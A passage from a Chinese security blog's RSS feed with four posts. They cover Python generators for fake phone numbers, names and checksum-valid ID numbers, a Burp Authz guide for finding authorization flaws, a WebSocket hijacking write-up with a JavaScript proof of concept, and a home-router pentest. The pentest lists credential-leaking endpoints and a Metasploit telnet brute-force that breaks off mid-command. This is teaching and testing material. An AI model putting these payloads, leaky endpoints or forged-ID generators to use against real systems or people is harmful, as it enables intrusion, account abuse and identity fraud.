quot;182&quot;:&quot;移动&quot;,&quot;183&quot;:&quot;移动&quot;,&quot;184&quot;:&quot;移动&quot;,&quot;187&quot;:&quot;移动&quot;,&quot;188&quot;:&quot;移动&quot;,&quot;198&quot;:&quot;移动&quot;}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;获取该数组的长度：len(prelist) -&amp;gt; 42&lt;/p&gt;

&lt;p&gt;随机生成下标获取三位数：&lt;code&gt;prelist.keys()[random.randint(0,41)]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;然后再随机填补后8位即可：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def genMobile():
    prelist = {&quot;133&quot;:&quot;电信&quot;,&quot;149&quot;:&quot;电信&quot;,&quot;153&quot;:&quot;电信&quot;,&quot;173&quot;:&quot;电信&quot;,&quot;177&quot;:&quot;电信&quot;,&quot;180&quot;:&quot;电信&quot;,&quot;181&quot;:&quot;电信&quot;,&quot;189&quot;:&quot;电信&quot;,&quot;199&quot;:&quot;电信&quot;,&quot;130&quot;:&quot;联通&quot;,&quot;131&quot;:&quot;联通&quot;,&quot;132&quot;:&quot;联通&quot;,&quot;145&quot;:&quot;联通&quot;,&quot;155&quot;:&quot;联通&quot;,&quot;156&quot;:&quot;联通&quot;,&quot;166&quot;:&quot;联通&quot;,&quot;171&quot;:&quot;联通&quot;,&quot;175&quot;:&quot;联通&quot;,&quot;176&quot;:&quot;联通&quot;,&quot;185&quot;:&quot;联通&quot;,&quot;186&quot;:&quot;联通&quot;,&quot;166&quot;:&quot;联通&quot;,&quot;134&quot;:&quot;移动&quot;,&quot;135&quot;:&quot;移动&quot;,&quot;136&quot;:&quot;移动&quot;,&quot;137&quot;:&quot;移动&quot;,&quot;138&quot;:&quot;移动&quot;,&quot;139&quot;:&quot;移动&quot;,&quot;147&quot;:&quot;移动&quot;,&quot;150&quot;:&quot;移动&quot;,&quot;151&quot;:&quot;移动&quot;,&quot;152&quot;:&quot;移动&quot;,&quot;157&quot;:&quot;移动&quot;,&quot;158&quot;:&quot;移动&quot;,&quot;159&quot;:&quot;移动&quot;,&quot;172&quot;:&quot;移动&quot;,&quot;178&quot;:&quot;移动&quot;,&quot;182&quot;:&quot;移动&quot;,&quot;183&quot;:&quot;移动&quot;,&quot;184&quot;:&quot;移动&quot;,&quot;187&quot;:&quot;移动&quot;,&quot;188&quot;:&quot;移动&quot;,&quot;198&quot;:&quot;移动&quot;}
    three = list(prelist.keys())[random.randint(0,len(prelist)-1)]
    mobile = three + &quot;&quot;.join(random.choice(&quot;0123456789&quot;) for i in range(8))
    op = prelist[three]
    return {mobile:op}
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;genname&quot;&gt;genName()&lt;/h3&gt;

&lt;p&gt;随机生成姓名：中文名字通常为2、3位汉字组成&lt;/p&gt;

&lt;p&gt;1.收集常用的姓氏随机取其一个：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def first_name():
    first_name_list = [&apos;赵&apos;, &apos;钱&apos;, &apos;孙&apos;, &apos;李&apos;, &apos;周&apos;, &apos;吴&apos;, &apos;郑&apos;, &apos;王&apos;, &apos;冯&apos;, &apos;陈&apos;, &apos;褚&apos;, &apos;卫&apos;, &apos;蒋&apos;, &apos;沈&apos;, &apos;韩&apos;, &apos;杨&apos;, &apos;朱&apos;, &apos;秦&apos;, &apos;尤&apos;, &apos;许&apos;,
                &apos;何&apos;, &apos;吕&apos;, &apos;施&apos;, &apos;张&apos;, &apos;孔&apos;, &apos;曹&apos;, &apos;严&apos;, &apos;华&apos;, &apos;金&apos;, &apos;魏&apos;, &apos;陶&apos;, &apos;姜&apos;, &apos;戚&apos;, &apos;谢&apos;, &apos;邹&apos;, &apos;喻&apos;, &apos;柏&apos;, &apos;水&apos;, &apos;窦&apos;, &apos;章&apos;,
                &apos;云&apos;, &apos;苏&apos;, &apos;潘&apos;, &apos;葛&apos;, &apos;奚&apos;, &apos;范&apos;, &apos;彭&apos;, &apos;郎&apos;, &apos;鲁&apos;, &apos;韦&apos;, &apos;昌&apos;, &apos;马&apos;, &apos;苗&apos;, &apos;凤&apos;, &apos;花&apos;, &apos;方&apos;, &apos;俞&apos;, &apos;任&apos;, &apos;袁&apos;, &apos;柳&apos;,
                &apos;酆&apos;, &apos;鲍&apos;, &apos;史&apos;, &apos;唐&apos;, &apos;费&apos;, &apos;廉&apos;, &apos;岑&apos;, &apos;薛&apos;, &apos;雷&apos;, &apos;贺&apos;, &apos;倪&apos;, &apos;汤&apos;, &apos;滕&apos;, &apos;殷&apos;, &apos;罗&apos;, &apos;毕&apos;, &apos;郝&apos;, &apos;邬&apos;, &apos;安&apos;, &apos;常&apos;,
                &apos;乐&apos;, &apos;于&apos;, &apos;时&apos;, &apos;傅&apos;, &apos;皮&apos;, &apos;卞&apos;, &apos;齐&apos;, &apos;康&apos;, &apos;伍&apos;, &apos;余&apos;, &apos;元&apos;, &apos;卜&apos;, &apos;顾&apos;, &apos;孟&apos;, &apos;平&apos;, &apos;黄&apos;, &apos;和&apos;, &apos;穆&apos;, &apos;萧&apos;, &apos;尹&apos;,
                &apos;姚&apos;, &apos;邵&apos;, &apos;堪&apos;, &apos;汪&apos;, &apos;祁&apos;, &apos;毛&apos;, &apos;禹&apos;, &apos;狄&apos;, &apos;米&apos;, &apos;贝&apos;, &apos;明&apos;, &apos;臧&apos;, &apos;计&apos;, &apos;伏&apos;, &apos;成&apos;, &apos;戴&apos;, &apos;谈&apos;, &apos;宋&apos;, &apos;茅&apos;, &apos;庞&apos;,
                &apos;熊&apos;, &apos;纪&apos;, &apos;舒&apos;, &apos;屈&apos;, &apos;项&apos;, &apos;祝&apos;, &apos;董&apos;, &apos;梁&apos;]
    n = random.randint(0, len(first_name_list) - 1)
    f_name = first_name_list[n]
    return f_name
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;2.这里一开始想搜罗常用的名字，但参考了其他师傅的代码发现随机生成中文字符更好一点：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def GBK2312():
    head = random.randint(0xb0, 0xf7)
    body = random.randint(0xa1, 0xf9)
    val = f&apos;{head:x}{body:x}&apos;
    st = bytes.fromhex(val).decode(&apos;gb2312&apos;)
    return st
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;3.随机生成名字的第二个字：(这里用一个list做一个空值，随机取生成的汉字或空值，&lt;strong&gt;用于成为随机生成2位名字或3位名字&lt;/strong&gt;)&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def second_name():
    second_name_list = [GBK2312(), &apos;&apos;]
    n = random.randint(0, 1)
    s_name = second_name_list[n]
    return s_name
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;4.随机生成名字的最后一个字：(用于满足三个汉字的名字)&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def last_name():
    return GBK2312()
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;5.拼接&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def last_name():
    return GBK2312()
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;genidcard&quot;&gt;genIdCard()&lt;/h3&gt;

&lt;p&gt;随机生成身份证：公民身份号码是由17位数字码和1位校验码组成&lt;/p&gt;

&lt;p&gt;18位数字组合的方式是：&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;1 1 0 1 0	2&lt;/th&gt;
      &lt;th&gt;Y Y	Y Y	M M D D&lt;/th&gt;
      &lt;th&gt;8 8&lt;/th&gt;
      &lt;th&gt;8&lt;/th&gt;
      &lt;th&gt;X&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;区域码(6位)&lt;/td&gt;
      &lt;td&gt;出生日期码(8位)&lt;/td&gt;
      &lt;td&gt;顺序码(2位)&lt;/td&gt;
      &lt;td&gt;性别码(1位)&lt;/td&gt;
      &lt;td&gt;校验码(1位)&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;ul&gt;
  &lt;li&gt;6位区域码爬取http://www.360doc.com/content/12/1010/21/156610_240728293.shtml，存到了&lt;code&gt;districtcode.py&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;区域码&lt;/strong&gt; 指的是公民常住户口所在县（市、镇、区）的&lt;a href=&quot;https://zh.wikipedia.org/wiki/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E8%A1%8C%E6%94%BF%E5%8C%BA%E5%88%92%E4%BB%A3%E7%A0%81&quot;&gt;行政区划代码&lt;/a&gt;，如110102是北京市-西城区。但港澳台地区居民的身份号码只精确到省级。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;8位出生日期码，具体Python代码如下：&lt;/li&gt;
&lt;/ul&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;age = random.randint(16,60) #可调整生成的年龄范围（身份证），这边是16-60岁
y = date.today().year - age #生成的年份
m = date(y, 1, 1) #生成的月份，初始值为1月1日
d = timedelta(days=random.randint(0, 364)) #随机生成的天数
datestring = str(m + d) #加天数得到最终值
&lt;/code&gt;&lt;/pre&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;出生日期码&lt;/strong&gt; 表示公民出生的公历年（4位）、月（2位）、日（2位）。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;2位顺序码&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;顺序码&lt;/strong&gt; 表示在同一区域码所标识的区域范围内，对同年、同月、同日出生的人编定的顺序号。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;1位性别码&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;性别码&lt;/strong&gt; 奇数表示男性，偶数表示女性。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;最后一位是&lt;strong&gt;校验码&lt;/strong&gt;，这里采用的是&lt;strong&gt;ISO 7064:1983,MOD 11-2&lt;/strong&gt;校验码系统。校验码为一位数，但如果最后采用校验码系统计算的校验码是“10”，碍于身份证号码为18位的规定，则以“X”代替校验码“10”。&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;最难的还是校验码的算法，参考师傅的解说：&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;1.将前面的身份证号码17位数分别乘以不同的系数。从第一位到第十七位的系数分别为：7 9 10 5 8 4 2 1 6 3 7 9 10 5 8 4 2&lt;/p&gt;
&lt;/blockquote&gt;

&lt;blockquote&gt;
  &lt;p&gt;2.将这17位数字和系数相乘的结果相加。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;blockquote&gt;
  &lt;p&gt;3.用加出来和除以11，得余数&lt;/p&gt;
&lt;/blockquote&gt;

&lt;blockquote&gt;
  &lt;p&gt;4.余数只可能是0 1 2 3 4 5 6 7 8 9 10这11个数字，其分别对应的最后一位身份证的号码为1 0 X 9 8 7 6 5 4 3 2。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;blockquote&gt;
  &lt;p&gt;5.通过上面得知如果余数是2，就会在身份证的第18位数字上出现罗马数字的Ⅹ，如果余数是10，身份证的最后一位号码就是2。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;测试代码如下，取了几个真实的身份证号码发现可用：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def test(id_num):
	id_code_list = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
	check_code_list = [1, 0, &apos;X&apos;, 9, 8, 7, 6, 5, 4, 3, 2]
	a = 0
	print(len(id_num))
	for i in range(17):
		a = a + (int(id_num[i]) * id_code_list[int(i)])
	print(check_code_list[a % 11])
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;整合一下（Copy）就变成了如下完整的代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def genIdCard(age,gender):
    area_code = (&apos;%s&apos; % random.choice(list(area_dict.keys())))
    id_code_list = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
    check_code_list = [1, 0, &apos;X&apos;, 9, 8, 7, 6, 5, 4, 3, 2]
    if str(area_code) not in area_dict.keys():
        return None
    datestring = str(date(date.today().year - age, 1, 1) + timedelta(days=random.randint(0, 364))).replace(&quot;-&quot;, &quot;&quot;)
    rd = random.randint(0, 999)
    if gender == 0:
        gender_num = rd if rd % 2 == 0 else rd + 1
    else:
        gender_num = rd if rd % 2 == 1 else rd - 1
    result = str(area_code) + datestring + str(gender_num).zfill(3)
    b = result + str(check_code_list[sum([a * b for a, b in zip(id_code_list, [int(a) for a in result])]) % 11])
    return b
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;参考&quot;&gt;参考&lt;/h2&gt;

&lt;p&gt;https://www.cnblogs.com/evening/archive/2012/04/19/2457440.html&lt;/p&gt;

&lt;p&gt;https://www.cnblogs.com/thunderLL/p/7682148.html&lt;/p&gt;

&lt;p&gt;https://blog.csdn.net/ak739105231/article/details/83932151&lt;/p&gt;

&lt;p&gt;https://github.com/jayknoxqu/id-number-util&lt;/p&gt;

&lt;p&gt;https://blog.csdn.net/tobacco5648/article/details/50613025&lt;/p&gt;

&lt;p&gt;https://github.com/xbeginagain/generator&lt;/p&gt;
</description>
          <pubDate>2019-08-16T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-08-16/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-08-16/1</guid>
        </item>
      
    
      
        <item>
          <title>基于BurpSuite快速探测越权-Authz插件</title>
          <description>&lt;h1 id=&quot;burpsuite---authz&quot;&gt;BurpSuite - Authz&lt;/h1&gt;

&lt;h2 id=&quot;背景&quot;&gt;背景&lt;/h2&gt;

&lt;p&gt;在平时的测试中，会经常的碰到业务功能较多的站点，如果想全面又快速的完成逻辑越权漏洞的检测不得不借助Authz插件去辅助检测越权问题。&lt;/p&gt;

&lt;h2 id=&quot;authz的工作原理&quot;&gt;Authz的工作原理&lt;/h2&gt;

&lt;p&gt;我们平时做测试的时候发现越权问题都是基于修改ID的方式：&lt;strong&gt;A的ID改成B的ID然后进行请求查看是否可以越权获取到信息&lt;/strong&gt;，&lt;strong&gt;或当ID的规律已知情况下基于Burp Intruder模块直接去遍历ID&lt;/strong&gt;。&lt;strong&gt;而基于Authz的检测是不一样的，其是将用户认证的HTTP请求头进行修改（Cookie之类的），然后通过响应长度、响应状态码判断是否存在越权&lt;/strong&gt;；&lt;strong&gt;从本质上来讲没有任何区别，只是换了一个角度&lt;/strong&gt;，但这样的&lt;strong&gt;好处&lt;/strong&gt;是一定程度上的减少了测试的时间（例如：&lt;strong&gt;一个商城的业务系统，你有A、B账户，A账户买了个商品获得一个订单信息请求，当你想测试是否能越权获取B账户订单时就需要使用B账户去再购买，然后判断测试。&lt;/strong&gt;）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409209407.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;BurpSuite Authz插件界面&lt;/p&gt;

&lt;h2 id=&quot;安装authz插件&quot;&gt;安装Authz插件&lt;/h2&gt;

&lt;p&gt;Github地址：&lt;a href=&quot;https://github.com/portswigger/authz&quot;&gt;https://github.com/portswigger/authz&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;快速安装-&amp;gt;在BurpSuite的BApp Store应用市场可以直接下载安装：&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409359506.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;使用authz插件检测&quot;&gt;使用Authz插件检测&lt;/h2&gt;

&lt;p&gt;使用插件检测的前提条件：&lt;strong&gt;同个业务系统中两个测试账号&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;作用：A账户用于功能的操作，B账户用于提供凭证（Cookie或者其他的用户身份凭证请求头）&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;举例说明：&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;一个业务系统，将A、B账户登入，同时获取B账户的Cookie或者其他的用户身份凭证请求头，填入到Authz的New Header里：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409465945.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;A账户去请求（Burp别忘了监听着），寻找读取类请求（该类请求要包含ID之类的特征）然后右键请求包将该请求发送到Authz插件内：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409564945.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;发送的请求会在Burp的Authz的Tab标签窗口内：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409674592.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当收集的差不多了，点击run跑起来：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409749591.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;结果会在Responses处显示：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409846702.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当原响应内容长度、响应状态码和被修改后请求的响应内容长度、响应状态码一致则会绿。&lt;/p&gt;

&lt;p&gt;也就代表着存在越权，单击选择一行即可在下面展示出请求、响应的报文：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596409926174.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里经过进一步检验（&lt;strong&gt;理论上不需要检验，但出于对测试的严谨态度还是检验一下比较好～&lt;/strong&gt;）顺利的发现了三枚越权访问漏洞。&lt;/p&gt;

&lt;p&gt;一个业务系统测完之后就Clear掉所有的东西，接着下一个业务系统咯：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-06-27/15596410022495.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;authz的优点和缺点总结&quot;&gt;Authz的优点和缺点总结&lt;/h2&gt;

&lt;p&gt;优点：使用简单、省时省力&lt;/p&gt;

&lt;p&gt;缺点：只是适用于检测越权读取类操作，删除编辑类操作还需人工判断。&lt;/p&gt;
</description>
          <pubDate>2019-06-27T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-06-27/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-06-27/1</guid>
        </item>
      
    
      
        <item>
          <title>浅谈WebSocket跨域劫持漏洞(CSWSH)</title>
          <description>&lt;h1 id=&quot;websocket-跨域劫持漏洞&quot;&gt;WebSocket 跨域劫持漏洞&lt;/h1&gt;

&lt;p&gt;WebSocket 跨域劫持漏洞，英文名：&lt;strong&gt;Cross-site WebSocket Hijacking&lt;/strong&gt;，漏洞类型：全能型CSRF（可读、可写）。&lt;/p&gt;

&lt;h2 id=&quot;了解websocket&quot;&gt;了解WebSocket&lt;/h2&gt;

&lt;h3 id=&quot;websocket-优点&quot;&gt;Websocket 优点&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;支持双向通信，实时性更强。&lt;/li&gt;
  &lt;li&gt;更好的二进制支持。&lt;/li&gt;
  &lt;li&gt;较少的控制开销。连接创建后，ws客户端、服务端进行数据交换时，协议控制的数据包头部较小。在不包含头部的情况下，服务端到客户端的包头只有2~10字节（取决于数据包长度），客户端到服务端的话，需要加上额外4字节的掩码。而HTTP协议每次通信都需要携带完整的头部。&lt;/li&gt;
  &lt;li&gt;支持扩展。ws协议定义了扩展，用户可以扩展协议，或者实现自定义的子协议。（比如支持自定义压缩算法等）&lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;websocket-如何建立连接&quot;&gt;Websocket 如何建立连接&lt;/h3&gt;

&lt;p&gt;画了一张图让你了解：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/CSWSH/0.png&quot; alt=&quot;websocket&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;漏洞产生&quot;&gt;漏洞产生&lt;/h2&gt;

&lt;p&gt;建立Websocket连接无验证。&lt;/p&gt;

&lt;h3 id=&quot;案例&quot;&gt;案例&lt;/h3&gt;

&lt;p&gt;1.如下请求：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;GET / HTTP/1.1
Host: localhost:8080
Origin: http://127.0.0.1:3000
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: w4v7O6xFTi36lq3RNcgctw==

&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;篡改Origin，发现没有对Origin进行验证，也可以跨域进行协议升级。&lt;/p&gt;

&lt;p&gt;2.进一步验证&lt;/p&gt;

&lt;p&gt;2.1获取到了一个发送评论的请求 （&lt;strong&gt;使用BurpSuite-&amp;gt;Proxy模块-&amp;gt;Websockets History查看，这里是对应的 Direction值为Outgoing为发出的请求，Incoming为发出请求对应的响应信息&lt;/strong&gt;）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/CSWSH/1.png&quot; alt=&quot;test&quot; /&gt;&lt;/p&gt;

&lt;p&gt;2.2使用JavaScript创建Websocket请求&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;如上图所示Outgoing的内容为“我是帅key的可爱小迷弟”，那么发送的数据就是这个&lt;/strong&gt;。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;meta charset=&quot;utf-8&quot;&amp;gt;
&amp;lt;script&amp;gt;
function ws_attack(){
	var ws = new WebSocket(&quot;ws://域名:端口/&quot;);//如果请求的Websocket服务仅支持HTTP就写成ws://，如果请求的Websocket服务支持HTTPs就写成wss://
	ws.onopen = function(evt) { 
		ws.send(&quot;我是帅key的可爱小迷弟！&quot;);
	};
	ws.onmessage = function(evt) {
		ws.close();
	};
}
ws_attack();
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;2.3验证发现可以请求并成功进行重放，存在Websocket跨域劫持&lt;/p&gt;

&lt;p&gt;（这里只是简单的评论请求，危害就是：点我链接让你评论我想评论的，试想：如果是修改密码的WebSocket请求存在劫持那么问题就大了～）&lt;/p&gt;

&lt;h2 id=&quot;漏洞利用&quot;&gt;漏洞利用&lt;/h2&gt;

&lt;p&gt;攻击流程跟以往的交互类漏洞没什么区别（点我链接读取你XXX、点我链接让你XXX）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/CSWSH/2.png&quot; alt=&quot;attack&quot; /&gt;&lt;/p&gt;

&lt;p&gt;来一个圈子”铸剑实战靶场”的截图，自我体会：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/CSWSH/3.png&quot; alt=&quot;success&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;poc代码编写&quot;&gt;PoC代码编写&lt;/h3&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;meta charset=&quot;utf-8&quot;&amp;gt;
&amp;lt;script&amp;gt;
function ws_attack(){//自定义函数ws_attack
    //定义函数功能
    //创建WebSocket并赋值给ws变量
	var ws = new WebSocket(&quot;ws://域名:端口/&quot;);//如果请求的Websocket服务仅支持HTTP就写成ws://，如果请求的Websocket服务支持HTTPs就写成wss://
	ws.onopen = function(evt) { 
        //当ws(WebSocket)处于连接状态时执行
		ws.send(&quot;我是帅key的可爱小迷弟！&quot;);
	};
	ws.onmessage = function(evt) {
        //当ws(WebSocket)请求有响应信息时执行
        //注意：响应的信息可以通过evt.data获取！例如：alert(evt.data);
		ws.close();
	};
}
ws_attack();//执行ws_attact函数
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;修复方法&quot;&gt;修复方法&lt;/h2&gt;

&lt;p&gt;综合建议：校验Origin头&lt;/p&gt;

&lt;h1 id=&quot;reference&quot;&gt;Reference&lt;/h1&gt;

&lt;p&gt;https://www.cnblogs.com/chyingp/p/websocket-deep-in.html&lt;/p&gt;
</description>
          <pubDate>2019-03-20T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-03-20/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-03-20/1</guid>
        </item>
      
    
      
        <item>
          <title>记一次移动光猫（GM219-S）安全测试</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;过个年，WiFi密码忘记了…光猫管理密码也忘记了（这个光猫也不支持物理按钮重置设置），但是手机还连着WiFi，正规操作找回不了密码，那就用咱们测试的思维来试试PWN掉这个路由器。&lt;/p&gt;

&lt;h1 id=&quot;过程&quot;&gt;过程&lt;/h1&gt;

&lt;h2 id=&quot;未授权获取wifi连接密码&quot;&gt;未授权获取WiFi连接密码&lt;/h2&gt;

&lt;p&gt;还好之前没闲着，发现管理的几个未授权访问的接口如下:&lt;/p&gt;

&lt;p&gt;获取宽带账号密码: &lt;code&gt;/GET_USER_WAN_PPP_INFO.json&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;获取 WLAN 连接信息: &lt;code&gt;/GET_WLAN_LINK_INFO.json&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;获取 DHCP 信息: &lt;code&gt;/GET_NET_DHCP_INFO.json&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;手机访问 &lt;code&gt;http://192.168.1.1/GET_WLAN_LINK_INFO.json&lt;/code&gt; ，获取密码：xxx，电脑连接登录&lt;/p&gt;

&lt;h2 id=&quot;信息收集&quot;&gt;信息收集&lt;/h2&gt;

&lt;h3 id=&quot;端口收集结果&quot;&gt;端口收集结果&lt;/h3&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Scanning promote.cache-dns.local (192.168.1.1) [1080 ports]
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 8080/tcp on 192.168.1.1
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;目录扫描结果&quot;&gt;目录扫描结果&lt;/h3&gt;

&lt;p&gt;获得的一些目录：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;/login.html
/login.asp
/index.asp
/telnet.asp
/upgrade.asp
...
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;突破口&quot;&gt;突破口&lt;/h2&gt;

&lt;p&gt;在目录扫描的时候，发现&lt;code&gt;/telnet.asp&lt;/code&gt; -&amp;gt; 跳转到 &lt;code&gt;/cgi-bin/telnet.asp&lt;/code&gt; 如下图所示界面：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/open_telnet.png&quot; alt=&quot;open_telnet&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这个功能可以开启光猫的&lt;code&gt;telnet&lt;/code&gt;服务，先开启，然后再使用Nmap扫描下端口：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Scanning promote.cache-dns.local (192.168.1.1) [1080 ports]
Discovered open port 8080/tcp on 192.168.1.1
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 8023/tcp on 192.168.1.1
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;发现多了个8023端口，其对应的服务果然是telnet：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;8023/tcp open  telnet
| fingerprint-strings:
|   GenericLines:
|     Star-Net Broadband Router
|     Login:
|     Password:
|   GetRequest:
|     Star-Net Broadband Router
|     Login: GET / HTTP/1.0
|     Password:
|   Help:
|     HELP
|     Star-Net Broadband Router
|     Login: Password:
|   NCP:
|     Star-Net Broadband Router
|     Login: DmdT^@^@^@
|     ^@^@^@^A^@^@^@^@^@
|   NULL:
|     Star-Net Broadband Router
|     Login:
|   RPCCheck:
|     Star-Net Broadband Router
|     Login:
|     ^@^@(r
|   SIPOptions:
|     Star-Net Broadband Router
|     Login: OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: &amp;lt;sip:nm@nm&amp;gt;;tag=root
|     &amp;lt;sip:nm2@nm2&amp;gt;
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: &amp;lt;sip:nm@nm&amp;gt;
|     Accept: application/sdp
|     Password:
|   tn3270:
|     ^@IBM-3279-4-E
|     ^YStar-Net Broadband Router
|_    Login:
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;telnet开启，爆破一波走起。（Caimima生成个密码口令）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/caimima.png&quot; alt=&quot;caimima&quot; /&gt;&lt;/p&gt;

&lt;p&gt;试了nmap貌似没啥用，开个msfconsole来爆破：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;use auxiliary/scanner/telnet/telnet_login
set RHOSTS 192.168.1.1 #设置模板
set RPORT 8023 #设置端口
set USER_FILE /root/user.txt #设置用户字典
